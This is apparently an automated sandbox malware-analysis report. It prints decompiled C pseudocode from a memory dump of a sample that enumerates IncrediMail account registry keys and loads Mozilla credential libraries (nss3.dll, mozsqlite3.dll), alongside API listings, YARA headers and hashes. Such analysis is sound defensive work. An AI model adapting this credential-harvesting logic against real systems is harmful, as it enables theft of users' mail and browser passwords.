                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 00403005
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • memset.MSVCRT ref: 00403052
                                                                                • sprintf.MSVCRT ref: 0040306A
                                                                                • memset.MSVCRT ref: 0040309B
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Close$EnumOpensprintf
                                                                                • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                • API String ID: 3672803090-3168940695
                                                                                • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                                                • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 48%
                                                                                			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                                                				char* _v0;
                                                                                				int _v4;
                                                                                				int _t39;
                                                                                				char* _t49;
                                                                                				void* _t51;
                                                                                				int _t64;
                                                                                				signed int _t70;
                                                                                				signed int _t71;
                                                                                
                                                                                				_t59 = __ecx;
                                                                                				_t71 = _t70 & 0xfffffff8;
                                                                                				E004118A0(0x204c, __ecx);
                                                                                				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                                				_a4 = _t39;
                                                                                				_v4 = 0;
                                                                                				if(_t39 <= 0) {
                                                                                					L15:
                                                                                					return _t39;
                                                                                				} else {
                                                                                					do {
                                                                                						memset( &_a57, 0, 0x1000);
                                                                                						_t71 = _t71 + 0xc;
                                                                                						_a44 =  &_a56;
                                                                                						_a8.cbSize = 0x30;
                                                                                						_a12 = 0x36;
                                                                                						_a48 = 0x1000;
                                                                                						_a56 = 0;
                                                                                						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                                							goto L14;
                                                                                						}
                                                                                						if(_a56 == 0) {
                                                                                							L12:
                                                                                							_t80 = _a28;
                                                                                							if(_a28 != 0) {
                                                                                								_push(0);
                                                                                								_push(_a28);
                                                                                								_push(_a4);
                                                                                								E00407A64(_t59, _t80);
                                                                                								_t71 = _t71 + 0xc;
                                                                                							}
                                                                                							goto L14;
                                                                                						}
                                                                                						_t64 = _a24;
                                                                                						_a4160 = 0;
                                                                                						memset( &_a4161, 0, 0x1000);
                                                                                						_t49 = strchr( &_a56, 9);
                                                                                						_t71 = _t71 + 0x14;
                                                                                						_v0 = _t49;
                                                                                						if(_a28 != 0) {
                                                                                							if(_a12 == 0) {
                                                                                								 *0x4171b4 =  *0x4171b4 + 1;
                                                                                								_t64 =  *0x4171b4 + 0x11558;
                                                                                								__eflags = _t64;
                                                                                							} else {
                                                                                								_t64 = _v4 + 0x11171;
                                                                                							}
                                                                                						}
                                                                                						_t51 = E00407D89(_t64,  &_a4160);
                                                                                						_pop(_t59);
                                                                                						if(_t51 != 0) {
                                                                                							if(_v0 != 0) {
                                                                                								strcat( &_a4160, _v0);
                                                                                								_pop(_t59);
                                                                                							}
                                                                                							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                                                						}
                                                                                						goto L12;
                                                                                						L14:
                                                                                						_v4 = _v4 + 1;
                                                                                						_t39 = _v4;
                                                                                					} while (_t39 < _a4);
                                                                                					goto L15;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 1757351179-3849865405
                                                                                • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                • memcpy.MSVCRT ref: 0040EA04
                                                                                • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                Strings
                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                • API String ID: 1640410171-2022683286
                                                                                • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00404837(void* __ecx) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				struct HWND__* _t6;
                                                                                				_Unknown_base(*)()* _t11;
                                                                                				struct HWND__* _t15;
                                                                                				void* _t20;
                                                                                				struct HINSTANCE__* _t23;
                                                                                
                                                                                				_v12 = 8;
                                                                                				_v8 = 0xff;
                                                                                				_t15 = 0;
                                                                                				_t20 = 0;
                                                                                				_t23 = LoadLibraryA("comctl32.dll");
                                                                                				if(_t23 == 0) {
                                                                                					L5:
                                                                                					__imp__#17();
                                                                                					_t6 = 1;
                                                                                					L6:
                                                                                					if(_t6 != 0) {
                                                                                						return 1;
                                                                                					} else {
                                                                                						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                				if(_t11 != 0) {
                                                                                					_t20 = 1;
                                                                                					_t15 =  *_t11( &_v12);
                                                                                				}
                                                                                				FreeLibrary(_t23);
                                                                                				if(_t20 == 0) {
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t6 = _t15;
                                                                                					goto L6;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                                • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040488A
                                                                                • MessageBoxA.USER32 ref: 004048A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 2780580303-317687271
                                                                                • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E004081B5(void* __eflags, char* _a4) {
                                                                                				void* __esi;
                                                                                				void* _t3;
                                                                                				int _t6;
                                                                                
                                                                                				_t3 = E0040614B(_a4);
                                                                                				if(_t3 != 0) {
                                                                                					strcpy(0x4171b8, _a4);
                                                                                					strcpy(0x4172c0, "general");
                                                                                					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                                                					asm("sbb eax, eax");
                                                                                					 *0x417304 =  ~(_t6 - 1) + 1;
                                                                                					E00407DC1(0x417308, "charset", 0x3f);
                                                                                					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                                                					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                                                				}
                                                                                				return _t3;
                                                                                			}







                                                                                APIs
                                                                                  • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                  • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 185930432-2094606381
                                                                                • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040DEA9() {
                                                                                				int _t3;
                                                                                				struct HINSTANCE__* _t5;
                                                                                				struct HINSTANCE__* _t6;
                                                                                				struct HINSTANCE__* _t9;
                                                                                
                                                                                				_t6 = GetModuleHandleA("nss3.dll");
                                                                                				_t5 = GetModuleHandleA("sqlite3.dll");
                                                                                				_t3 = GetModuleHandleA("mozsqlite3.dll");
                                                                                				_t9 = _t3;
                                                                                				if(_t6 != 0) {
                                                                                					_t3 = FreeLibrary(_t6);
                                                                                				}
                                                                                				if(_t5 != 0) {
                                                                                					_t3 = FreeLibrary(_t5);
                                                                                				}
                                                                                				if(_t9 != 0) {
                                                                                					return FreeLibrary(_t9);
                                                                                				}
                                                                                				return _t3;
                                                                                			}








                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHandleLibraryModule
                                                                                • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                • API String ID: 662261464-3550686275
                                                                                • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E0040E172(char* __edi, char* __esi) {
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				char* _t15;
                                                                                				void* _t38;
                                                                                				char* _t48;
                                                                                
                                                                                				_t49 = __esi;
                                                                                				_t48 = __edi;
                                                                                				if(__esi[1] != 0x3a) {
                                                                                					_t15 = strchr( &(__esi[2]), 0x3a);
                                                                                					if(_t15 == 0) {
                                                                                						_t38 = E004069D2(0, "\\systemroot");
                                                                                						if(_t38 < 0) {
                                                                                							if( *__esi != 0x5c) {
                                                                                								strcpy(__edi, __esi);
                                                                                							} else {
                                                                                								_v268 = 0;
                                                                                								memset( &_v267, 0, 0x104);
                                                                                								E00406325( &_v268);
                                                                                								memcpy(__edi,  &_v268, 2);
                                                                                								__edi[2] = 0;
                                                                                								strcat(__edi, __esi);
                                                                                							}
                                                                                						} else {
                                                                                							_v268 = 0;
                                                                                							memset( &_v267, 0, 0x104);
                                                                                							E00406325( &_v268);
                                                                                							strcpy(__edi,  &_v268);
                                                                                							_t8 =  &(_t49[0xb]); // 0xb
                                                                                							strcat(__edi, _t38 + _t8);
                                                                                						}
                                                                                						L11:
                                                                                						return _t48;
                                                                                					}
                                                                                					_push(_t15 - 1);
                                                                                					L4:
                                                                                					strcpy(_t48, ??);
                                                                                					goto L11;
                                                                                				}
                                                                                				_push(__esi);
                                                                                				goto L4;
                                                                                			}









                                                                                APIs
                                                                                • strchr.MSVCRT ref: 0040E18A
                                                                                • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                  • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                • memset.MSVCRT ref: 0040E1CF
                                                                                  • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                  • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                • memset.MSVCRT ref: 0040E217
                                                                                • memcpy.MSVCRT ref: 0040E232
                                                                                • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 1680921474-1821301763
                                                                                • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                                                				void* __esi;
                                                                                				intOrPtr* _t27;
                                                                                				void* _t30;
                                                                                				struct HWND__* _t32;
                                                                                				void* _t35;
                                                                                				intOrPtr* _t36;
                                                                                
                                                                                				_t30 = __edx;
                                                                                				_t27 = __ecx;
                                                                                				_push(__ebx);
                                                                                				_push(__edi);
                                                                                				_t32 =  *(__ecx + 4);
                                                                                				_t35 = __ecx + 0xc;
                                                                                				 *(_t35 + 0x10) = _t32;
                                                                                				GetClientRect(_t32, _t35 + 0xa14);
                                                                                				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
                                                                                				GetWindow(GetWindow(_t32, 5), 0);
                                                                                				do {
                                                                                					__eax = E00401657(__edi, __esi);
                                                                                					__edi = GetWindow(__edi, 2);
                                                                                				} while (__edi != 0);
                                                                                				__esi = GetDlgItem;
                                                                                				__edi = 0x3ed;
                                                                                				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
                                                                                				 *__esp = 0x3ee;
                                                                                				GetDlgItem(??, ??) = E0040F037(__eax);
                                                                                				 *__esp = 0x3ef;
                                                                                				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
                                                                                				 *__esp = 0x3f4;
                                                                                				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
                                                                                				__eax =  *(__ebx + 4);
                                                                                				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
                                                                                				_pop(__edi);
                                                                                				_pop(__esi);
                                                                                				__ecx = __ebx;
                                                                                				_pop(__ebx);
                                                                                				_t36 = _t27;
                                                                                				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
                                                                                				 *((intOrPtr*)( *_t36 + 0x18))();
                                                                                				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
                                                                                				return 0;
                                                                                			}










                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 00405BFB
                                                                                • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                • GetWindow.USER32(00000000), ref: 00405C16
                                                                                  • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                  • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                • GetDlgItem.USER32 ref: 00405C39
                                                                                • GetDlgItem.USER32 ref: 00405C4B
                                                                                • GetDlgItem.USER32 ref: 00405C5D
                                                                                • GetDlgItem.USER32 ref: 00405C6F
                                                                                • GetDlgItem.USER32 ref: 00405C7D
                                                                                • SetFocus.USER32(00000000), ref: 00405C80
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                • String ID:
                                                                                • API String ID: 2187283481-0
                                                                                • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E00401A50(char* __edi, int __fp0) {
                                                                                				void* _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* _v16;
                                                                                				void* _v20;
                                                                                				int _v28;
                                                                                				int _v36;
                                                                                				void* _v40;
                                                                                				void* _v44;
                                                                                				void* _v48;
                                                                                				void* _v52;
                                                                                				void* _v56;
                                                                                				void* _v60;
                                                                                				char _v64;
                                                                                				int _t79;
                                                                                				intOrPtr _t80;
                                                                                				int _t81;
                                                                                				signed int _t94;
                                                                                				int _t98;
                                                                                				int _t100;
                                                                                				void* _t104;
                                                                                				void* _t106;
                                                                                				intOrPtr _t115;
                                                                                				char _t117;
                                                                                				char* _t118;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				int _t122;
                                                                                				signed int _t123;
                                                                                				int* _t125;
                                                                                				int _t159;
                                                                                				int _t165;
                                                                                
                                                                                				_t159 = __fp0;
                                                                                				_t118 = __edi;
                                                                                				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                                				_t79 = strlen(__edi);
                                                                                				asm("fldz");
                                                                                				_t104 = 0;
                                                                                				_v28 = __fp0;
                                                                                				_t120 = 0;
                                                                                				_t106 = _t119;
                                                                                				_v36 = _t79;
                                                                                				_v56 = 0;
                                                                                				_v52 = 0;
                                                                                				_v48 = 0;
                                                                                				_v44 = 0;
                                                                                				_v60 = 0;
                                                                                				_v40 = 0;
                                                                                				_v12 = 0x20;
                                                                                				_v20 = 0;
                                                                                				_v8 = 0;
                                                                                				_v16 = 0;
                                                                                				if(_t79 > 0) {
                                                                                					do {
                                                                                						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                                						_v64 = _t117;
                                                                                						if(_t117 - 0x41 <= 0x19) {
                                                                                							_v56 = _v56 + 1;
                                                                                						}
                                                                                						if(_t117 - 0x61 <= 0x19) {
                                                                                							_v52 = _v52 + 1;
                                                                                						}
                                                                                						if(_t117 - 0x30 <= 9) {
                                                                                							_v48 = _v48 + 1;
                                                                                						}
                                                                                						if(_t117 - 0x20 <= 0xf) {
                                                                                							_v44 = _v44 + 1;
                                                                                						}
                                                                                						if(_t117 - 0x3a <= 6) {
                                                                                							_v60 = _v60 + 1;
                                                                                						}
                                                                                						if(_t117 - 0x5b <= 5) {
                                                                                							_v60 = _v60 + 1;
                                                                                						}
                                                                                						if(_t117 < 0x7b) {
                                                                                							L16:
                                                                                							if(_t117 > 0x7e) {
                                                                                								goto L17;
                                                                                							}
                                                                                						} else {
                                                                                							if(_t117 > 0x7e) {
                                                                                								L17:
                                                                                								_v40 = _v40 + 1;
                                                                                							} else {
                                                                                								_v60 = _v60 + 1;
                                                                                								goto L16;
                                                                                							}
                                                                                						}
                                                                                						if(_t120 != _t104) {
                                                                                							_t94 = 0;
                                                                                							if(_v8 <= 0) {
                                                                                								L27:
                                                                                								_t94 = _t94 | 0xffffffff;
                                                                                							} else {
                                                                                								L21:
                                                                                								L21:
                                                                                								if(_t94 < 0 || _t94 >= _v8) {
                                                                                									_t115 = 0;
                                                                                								} else {
                                                                                									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                                								}
                                                                                								if(_t115 == _t117) {
                                                                                									goto L28;
                                                                                								}
                                                                                								_t94 = _t94 + 1;
                                                                                								if(_t94 < _v8) {
                                                                                									goto L21;
                                                                                								} else {
                                                                                									goto L27;
                                                                                								}
                                                                                							}
                                                                                							L28:
                                                                                							_t104 = 0;
                                                                                							if(_t94 < 0) {
                                                                                								E004045E8( &_v20, _v64);
                                                                                								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                                								_pop(_t106);
                                                                                								if(_t98 != 1) {
                                                                                									_t47 = _t98 - 2; // -2
                                                                                									_t106 = _t47;
                                                                                									if(_t106 > 3) {
                                                                                										if(_t98 < 6) {
                                                                                											if(_t98 > 0xa) {
                                                                                												goto L40;
                                                                                											}
                                                                                										} else {
                                                                                											if(_t98 > 0xa) {
                                                                                												goto L40;
                                                                                											} else {
                                                                                												_t159 = _v28 +  *0x414510;
                                                                                											}
                                                                                											goto L41;
                                                                                										}
                                                                                									} else {
                                                                                										_t159 = _v28 +  *0x414518;
                                                                                										goto L41;
                                                                                									}
                                                                                								} else {
                                                                                									_t165 = _v28;
                                                                                									goto L30;
                                                                                								}
                                                                                							} else {
                                                                                								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                                                								_t165 = _v28;
                                                                                								_pop(_t106);
                                                                                								if(_t100 != 0) {
                                                                                									_t159 = _t165 +  *0x414520;
                                                                                								} else {
                                                                                									L30:
                                                                                									_t159 = _t165 +  *0x414528;
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                						} else {
                                                                                							E004045E8( &_v20, _v64);
                                                                                							L40:
                                                                                							_t159 = _v28 +  *0x414508;
                                                                                							L41:
                                                                                							_v28 = _t159;
                                                                                						}
                                                                                						_t120 = _t120 + 1;
                                                                                					} while (_t120 < _v36);
                                                                                				}
                                                                                				_v64 = _t104;
                                                                                				_t80 = 0x1a;
                                                                                				if(_v56 != _t104) {
                                                                                					_v64 = _t80;
                                                                                				}
                                                                                				if(_v52 != _t104) {
                                                                                					_v64 = _v64 + _t80;
                                                                                				}
                                                                                				if(_v48 != _t104) {
                                                                                					_v64 = _v64 + 0xa;
                                                                                				}
                                                                                				if(_v44 != _t104) {
                                                                                					_v64 = _v64 + 0x10;
                                                                                				}
                                                                                				if(_v60 != _t104) {
                                                                                					_v64 = _v64 + 0x11;
                                                                                				}
                                                                                				if(_v40 != _t104) {
                                                                                					_v64 = _v64 + 0x1e;
                                                                                				}
                                                                                				if(_v64 <= _t104) {
                                                                                					if(_v20 != _t104) {
                                                                                						free(_v20);
                                                                                					}
                                                                                					_t81 = 0;
                                                                                				} else {
                                                                                					asm("fild dword [esp+0xc]");
                                                                                					_push(_t106);
                                                                                					_push(_t106);
                                                                                					 *_t125 = _t159;
                                                                                					L004115B8();
                                                                                					_v36 = _t159;
                                                                                					 *_t125 =  *0x414500;
                                                                                					L004115B8();
                                                                                					asm("fdivr qword [esp+0x30]");
                                                                                					asm("fistp qword [esp+0x30]");
                                                                                					_t122 = _v28;
                                                                                					if(_v20 != _t104) {
                                                                                						free(_v20);
                                                                                					}
                                                                                					_t81 = _t122;
                                                                                				}
                                                                                				return _t81;
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$strlen
                                                                                • String ID:
                                                                                • API String ID: 667451143-3916222277
                                                                                • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
